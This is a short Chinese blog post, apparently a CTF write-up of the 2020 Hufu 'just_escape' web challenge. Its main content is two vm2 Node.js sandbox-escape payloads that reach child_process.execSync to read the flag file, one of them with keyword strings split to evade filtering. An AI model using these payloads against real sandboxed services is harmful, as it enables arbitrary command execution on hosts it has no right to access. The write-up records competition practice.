【原创】记一次ctf实战——2020-数字中国创新大赛虎符网络安全赛道-Web-just_escape

admin

102621
文章

87
评论

2022年12月3日16:42:37评论27 views字数 1109阅读3分41秒阅读模式

[huayang]

【原创】记一次ctf实战——2020-数字中国创新大赛虎符网络安全赛道-Web-just_escape

进去看看

有意思的点

去run.php看看

<?php
if( array_key_exists( "code", $_GET ) && $_GET[ 'code' ] != NULL ) {
    $code = $_GET['code'];
    echo eval(code);
} else {
    highlight_file(__FILE__);
}
?>

审计一下

没有什么看的，，，没头绪

看看别人的文章

哦，Node.js沙箱逃逸，又是新姿势

所以就简单说一下fla扩展知识放在以后再说

既然知道了是Node.js沙箱逃逸我们用Error().stack查出错误信息

从中可知js的vn2框架

直接去网上找payload

run.php?code[]=try{Buffer.from(new Proxy({}, {getOwnPropertyDescriptor(){throw f=>f.constructor("return process")();}}));}catch(e){ e(()=>{}).mainModule.require("child_process").execSync("cat /flag").toString();}

run.php?code[]=(function (){
    TypeError[`${`${`prototyp`}e`}`][`${`${`get_proces`}s`}`] = f=>f[`${`${`constructo`}r`}`](`${`${`return this.proces`}s`}`)();
    try{
        Object.preventExtensions(Buffer.from(``)).a = 1;
    }catch(e){
        return e[`${`${`get_proces`}s`}`](()=>{}).mainModule[`${`${`requir`}e`}`](`${`${`child_proces`}s`}`)[`${`${`exe`}cSync`}`](`cat /flag`).toString();
    }
})()

https://www.jianshu.com/p/67b5b05137da

https://xz.aliyun.com/t/7184

https://www.cnblogs.com/ichunqiu/p/12841211.html

https://www.anquanke.com/post/id/170708?display=mobile

[/huayang]

FROM：浅浅淡淡[hellohy]

左青龙
微信扫一扫

右白虎
微信扫一扫

【原创】记一次ctf实战——2020-数字中国创新大赛虎符网络安全赛道-Web-just_escape

php Thread实例

获取wdigest明文密码加密传输至远程服务器

dump lsass进程

CVE-2020-0688 powershell版

CVE-2020-0601 伪造签名笔记

从零开始学windows API

查看注册表键值修改时间

c++ 修改注册表键值

keylogger

使用 R820T2 电视棒收听 FM 广播

发表评论

在线咨询

微信